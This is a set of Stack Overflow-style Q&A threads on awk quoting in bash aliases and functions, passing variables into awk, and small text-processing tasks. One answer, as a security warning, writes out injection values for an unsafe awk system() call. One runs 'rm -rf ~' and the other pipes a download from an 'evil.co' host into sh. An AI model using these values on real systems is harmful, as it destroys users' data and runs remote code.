Using awk in BASH alias or function - bash

I've a command that works just fine at the command line, but not when I try to put it in an alias or function.
$ awk '{print $1}' /tmp/textfile
0
That's correct, as '0' is in position 1 of "textfile".
$ alias a="awk '{print $1}' /tmp/textfile"
$ a
1 0 136 94
That's the entire line in "textfile". I've tried every variety of quotes, parentheses and backticks that I could imagine might work. I can get the same problem in a wide variety of formats.
What am I not understanding?

You need to escape the $ like so:
alias a="awk '{print \$1}' /tmp/textfile"
Otherwise your alias is:
awk '{print }' /tmp/textfile
Which prints the whole file...

Use a function instead of alias
myfunc(){ awk '{print $1}' file; }

Related

awk: using bash variable inside the awk script

The following bash code incorporates the awk code to fuse file1 and file2 in the special fashion, detecting some blocks in the file2 and inserting there all strings from the file1.
#!/bin/bash
# v 0.09 beta
file1=/usr/data/temp/data1.pdb
file2=/usr/data/temp/data2.pdb
# merge the both
awk -v file="${file1}" '/^ENDMDL$/ {system("cat file");}; {print}' "${results}"/"${file2} >> output.pdb
The problem that I can not use in the awk part the variable "file", which relates to the file1 defined in bash
{system("cat file");}
othervise if I past here the full path of the file1 it works well
{system("cat /usr/data/temp/data1.pdb");}
how I could fix my awk code to be able using directly a bash variable there?
The Literal (But Evil, Insecure) Answer
To answer your literal question:
awk -v insecure="filename" 'BEGIN { system("cat " insecure) }'
...will run cat filename.
But if someone passed insecure="filename; rm -rf ~" or insecure='$(curl http://evil.co | sh)', you'd have a very bad day.
The Right Answer
Pass the filename on awk's command line, and check FNR to see if you're reading the first file or a subsequent one.
Use GNU Awk's readfile library:
gawk -i readfile -v file1="$file1" 'BEGIN { file1_data = readfile(file1) }
/^ENDMDL$/ { printf "%s", file1_data } 1' ...
Alternative you can use a while ((getline < file1) > 1) loop to fetch the data.
This is easier with sed
$ sed '/^ENDMDL$/r file1' file2
inserts file1 after the marker.
to replace the marker line with the file1 contents
$ sed -e '/^ENDMDL$/{r file1' -e 'd}' file2

AWK alias not printing

The below awk command (copied and pasted from stackoverflow) works fine from the command line but doesnt print anything when aliased
awk '/WORD/ {print $3}' log.log | awk 'BEGIN{c=0} length($0){a[c]=$0;c++}END{p5=(c/100*5); p5=p5%1?int(p5)+1:p5; print a[c-p5-1]}'
alias getperc="awk '/WORD/ {print \$3}' log.log | awk 'BEGIN{c=0} length(\$0){a[c]=$0;c++}END{p5=(c/100*5); p5=p5%1?int(p5)+1:p5; print a[c-p5-1]}'"
I am fairly new to using bash. What am I missing here?
Don't use aliases. They require an additional layer of quoting, which is troublesome (as here), and they prevent you from being able to usefully parameterize or add conditional logic to your code.
A simple transliteration to a function is:
getperc() { awk '/WORD/ {print $3}' log.log | awk 'BEGIN{c=0} length($0){a[c]=$0;c++}END{p5=(c/100*5); p5=p5%1?int(p5)+1:p5; print a[c-p5-1]}'; }
A slightly more capable one, which will still use log.log by default, but which will also let you provide an alternate input file name (as in getperc alternate.log) or pipe to your function (as in cat alternate.log | getperc):
getperc() {
[[ -t 0 || $1 ]] || set -- - # use "-" (stdin) as input file if not a TTY
# ...this will let you pipe to your function.
awk '/WORD/ {print $3}' "${1:-log.log}" | awk 'BEGIN{c=0} length($0){a[c]=$0;c++}END{p5=(c/100*5); p5=p5%1?int(p5)+1:p5; print a[c-p5-1]}'
}
I think there is confusion by bash regarding $3 and $0 it thinks they are argument of the alias. you can verify this by
try this in bash
alias ech="echo {print \$3}"
it will print just
{print }
but now try
alias ech="echo {print \$\3}"
it will print what you expected
{print $3}
Let me know if this solves your problem

how to pass in a variable to awk commandline

I'm having some trouble passing bash script variables into awk command-line.
Here is pseudocode:
for FILE in $INPUT_DIR/*.txt; do
filename=`echo $FILE | sed -n 's/^.*\(chr[0-9A-Z]*\).*.vcf$/\1/p'`
OUTPUT_FILE=$OUTPUT_DIR/$filename.snps.txt
egrep -v "^#" $FILE | awk '{print $2,$4,$5}' > $OUTPUT_FILE
done
The final line where I awk the columns, I would like it to be flexible or user input. For example, the user could want columns 6,7,and 8 as well, or column 133 and 138, or column 245 through 248. So how do I custom this so I can have that 'print $2 .... $5' be a user input thing? For example the user would run this script like : bash script.sh input_dir output_dir [user inputs whatever string of columns], and then I would get those columns in the output. I tried passing it in, but I guess I'm not getting the syntax right.
With awk, you should declare the variable before use it. This is better than the escape method (awk '{print $'$var'}'):
awk -v var1="$col1" -v var2="$col2" 'BEGIN {print var1,var2 }'
Where $col1 and $col2 would be the input variables.
Maybe you can try an input variable as string with "$2,$4,$5" and print this variable to get the values (I am not sure if this works)
The following test works for me:
A="\$3" ; ls -l | awk "{ print $A }"

Store String var in awk command

I have txt file like this:
Dupont Charles
Martin Paul
Dupuis Jean
I want, for each line, to make a login corresponding to first 2 caracters of each names.
For instance : Dupont Charles ==> duch
awk '{print tolower(substr($1,1,1)substr($2,1,1))}' liste.txt
works perfectly.
but i want to store each login in var and call a bash script (uscript) with that var...
awk '{login=tolower(substr($1,1,1)substr($2,1,1));print $login; script1 $login; }' liste.txt
But it does not work and the content of login is not what I want.
The way to use variables in awk is different from Bash. In awk, a variable does not have a leading $. So what you want to say is:
awk '{login=tolower(substr($1,1,1)substr($2,1,1));print login; }' liste.txt
# ^
# intead of $login
However, you are willing to use a script script1 with this value. For this, you may want to use system() to call an external command............... or use a while block to handle all in one.
while IFS= read -r name surname
do
login=${name:0:2}${surname:0:2}
script1 "$login"
done < file
This uses the same logic to get the 3 first characters of a variable:
$ v="123456789"
$ echo ${v:0:3}
123
awk '{print tolower(substr($1,1,2)substr($2,1,2))}' liste.txt | xargs script1
e.g. using echo instead of script1 which of course I don't have:
$ awk '{print tolower(substr($1,1,2)substr($2,1,2))}' liste.txt | xargs echo
duch mapa duje
or if script1 requires 1 arg at a time:
awk '{print tolower(substr($1,1,2)substr($2,1,2))}' liste.txt | xargs -n1 script1
e.g.
$ awk '{print tolower(substr($1,1,2)substr($2,1,2))}' liste.txt | xargs -n1 echo
duch
mapa
duje

How to get the desired output

I am getting an input from a shell script, something like:
USER1_OLD:USER1_NEW,USER2_OLD:USER2_NEW ....
The number of key pairs can vary. I need to get output like:
USER1_OLD,USER2_OLD,......
One way using awk:
$ ./script.sh | awk '{printf "%s",NR==1?$1:","$1}' FS=: RS=,
USER1_OLD,USER2_OLD
It's not clear if you want a trailing comma, if you do the script can be simpler:
$ ./script.sh | awk '{print $1}' FS=: RS=, ORS=,
USER1_OLD,USER2_OLD,

Resources